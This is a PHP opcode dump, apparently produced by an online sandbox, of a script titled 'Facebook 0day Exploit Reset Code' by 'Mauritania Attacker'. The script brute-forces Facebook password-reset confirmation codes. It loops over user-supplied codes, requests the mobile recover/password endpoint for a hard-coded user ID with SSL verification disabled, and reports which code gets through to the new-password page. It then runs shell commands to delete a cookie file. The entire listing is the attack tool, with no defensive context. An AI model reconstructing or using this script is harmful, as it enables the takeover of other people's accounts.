Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 43) Position 1 = 16, Position 2 = 82 Branch analysis from position: 16 2 jumps found. (Code = 77) Position 1 = 17, Position 2 = 81 Branch analysis from position: 17 2 jumps found. (Code = 78) Position 1 = 18, Position 2 = 81 Branch analysis from position: 18 2 jumps found. (Code = 43) Position 1 = 68, Position 2 = 73 Branch analysis from position: 68 1 jumps found. (Code = 42) Position 1 = 77 Branch analysis from position: 77 1 jumps found. (Code = 42) Position 1 = 17 Branch analysis from position: 17 Branch analysis from position: 73 1 jumps found. (Code = 42) Position 1 = 17 Branch analysis from position: 17 Branch analysis from position: 81 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 81 Branch analysis from position: 82 filename: /in/KZlXv function name: (null) number of ops: 93 compiled vars: !0 = $user, !1 = $code, !2 = $ch, !3 = $check line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 29 0 E > BEGIN_SILENCE ~4 1 INIT_FCALL 'set_time_limit' 2 SEND_VAL 0 3 DO_ICALL 4 END_SILENCE ~4 30 5 ECHO '%3Cform+method%3D%27POST%27%3E%0A++++%3Ctitle%3EFacebook+Code+Security+Cracker+%3E+By+Mauritania+Attacker%3C%2Ftitle%3E%0A++++%3Cp+align%3D%27center%27%3E%0A++++%3Cimg+border%3D%270%27+src%3D%27http%3A%2F%2Fwww.bubblews.com%2Fassets%2Fimages%2Fnews%2F740959391_1392900678.png%27+width%3D%27444%27+height%3D%27298%27%3E%3C%2Fp%3E%0A++++%3Cstyle%3E%0A++++%2F%2A+Rounded+Corners+%2A%2F%0A++++%23ghost+%7B%0A++++border%3A+1px+%23765942%3B%0A++++border-radius%3A+10px%3B%0A++++height%3A+250px%3B%0A++++width%3A+200px%3B+%7D%0A++++input+%7B++++%0A++++%2F%2A+INPUTS+%2A%2F%0A++++border%3A+1px+solid+%23765942%3B%0A++++border-radius%3A+10px%3B+%7D%0A++++%3C%2Fstyle%3E%0A++++%3Ccenter%3E%3Cfont+color%3D%27%23006600%27+size%3D%274%27+face%3D%27impact%27%3EFacebook+0day+Exploit+Reset+Code+Priv8+By+Mauritania+Attacker%3C%2Fcenter%3E%0A++++++++%3Ccenter%3E%3Ctextarea+cols%3D%2710%27+rows%3D%276%27+id%3D%27ghost%27+name%3D%27code%27%3E%3C%2Ftextarea%3E%3Cbr%3E%3C%2Fcenter%3E%0A++++%3Cp%3E%3Ccenter%3E%3Cinput+type%3D%27submit%27+value%3D%27Crack+Reset+Code%27+name%3D%27scan%27%3E%3Cbr%3E%3Cbr%3E%3C%2Fcenter%3E%3C%2Fp%3E%0A++++%3C%2Fform%3E' 50 6 INIT_FCALL 'explode' 7 SEND_VAL '%0D%0A' 8 FETCH_R global ~6 '_POST' 9 FETCH_DIM_R ~7 ~6, 'code' 10 SEND_VAL ~7 11 DO_ICALL $8 12 ASSIGN !0, $8 51 13 FETCH_R global ~10 '_POST' 14 FETCH_DIM_R ~11 ~10, 'scan' 15 > JMPZ ~11, ->82 53 16 > > FE_RESET_R $12 !0, ->81 17 > > FE_FETCH_R $12, !1, ->81 56 18 > INIT_FCALL_BY_NAME 'curl_init' 19 DO_FCALL 0 $13 20 ASSIGN !2, $13 57 21 INIT_FCALL_BY_NAME 'curl_setopt' 22 SEND_VAR_EX !2 23 FETCH_CONSTANT ~15 'CURLOPT_URL' 24 SEND_VAL_EX ~15 25 NOP 26 FAST_CONCAT ~16 'https%3A%2F%2Fm.facebook.com%2Frecover%2Fpassword%3Fu%3D100001894582454%26n%3D', !1 27 SEND_VAL_EX ~16 28 DO_FCALL 0 58 29 INIT_FCALL_BY_NAME 'curl_setopt' 30 SEND_VAR_EX !2 31 FETCH_CONSTANT ~18 'CURLOPT_SSL_VERIFYPEER' 32 SEND_VAL_EX ~18 33 SEND_VAL_EX <false> 34 DO_FCALL 0 59 35 INIT_FCALL_BY_NAME 'curl_setopt' 36 SEND_VAR_EX !2 37 FETCH_CONSTANT ~20 'CURLOPT_RETURNTRANSFER' 38 SEND_VAL_EX ~20 39 SEND_VAL_EX 1 40 DO_FCALL 0 60 41 INIT_FCALL_BY_NAME 'curl_setopt' 42 SEND_VAR_EX !2 43 FETCH_CONSTANT ~22 'CURLOPT_FOLLOWLOCATION' 44 SEND_VAL_EX ~22 45 SEND_VAL_EX 1 46 DO_FCALL 0 61 47 INIT_FCALL_BY_NAME 'curl_setopt' 48 SEND_VAR_EX !2 49 FETCH_CONSTANT ~24 'CURLOPT_HEADER' 50 SEND_VAL_EX ~24 51 SEND_VAL_EX 1 52 DO_FCALL 0 62 53 INIT_FCALL_BY_NAME 'curl_setopt' 54 SEND_VAR_EX !2 55 FETCH_CONSTANT ~26 'CURLOPT_USERAGENT' 56 SEND_VAL_EX ~26 57 SEND_VAL_EX 'Chrome%2F35.0.1916.114' 58 DO_FCALL 0 64 59 INIT_FCALL_BY_NAME 'curl_exec' 60 SEND_VAR_EX !2 61 DO_FCALL 0 $28 62 ASSIGN !3, $28 65 63 INIT_FCALL_BY_NAME 'eregi' 64 SEND_VAL_EX 'password_new' 65 SEND_VAR_EX !3 66 DO_FCALL 0 $30 67 > JMPZ $30, ->73 67 68 > ROPE_INIT 3 ~32 '%3Cfont+face%3D%27Tahoma%27+size%3D%272%27+color%3D%27green%27%3E' 69 ROPE_ADD 1 ~32 ~32, !1 70 ROPE_END 2 ~31 ~32, '+%3D%3E+Facebook+Confirmation+Code+Found+%5E_%5E+%3C%2Ffont%3E%3Cbr%3E' 71 ECHO ~31 72 > JMP ->77 71 73 > ROPE_INIT 3 ~35 '%3Cfont+face%3D%27Tahoma%27+size%3D%272%27+color%3D%27red%27%3E' 74 ROPE_ADD 1 ~35 ~35, !1 75 ROPE_END 2 ~34 ~35, '+%3D%3E+Incorrect+Code+Trying+More...%3C%2Ffont%3E%3Cbr%3E' 76 ECHO ~34 73 77 > INIT_FCALL_BY_NAME 'curl_close' 78 SEND_VAR_EX !2 79 DO_FCALL 0 53 80 > JMP ->17 81 > FE_FREE $12 76 82 > BEGIN_SILENCE ~38 83 INIT_FCALL 'system' 84 SEND_VAL 'del+cookie.txt' 85 DO_ICALL 86 END_SILENCE ~38 77 87 BEGIN_SILENCE ~40 88 INIT_FCALL 'system' 89 SEND_VAL 'rm+cookie.txt' 90 DO_ICALL 91 END_SILENCE ~40 78 92 > RETURN 1
Generated using Vulcan Logic Dumper, using php 8.0.0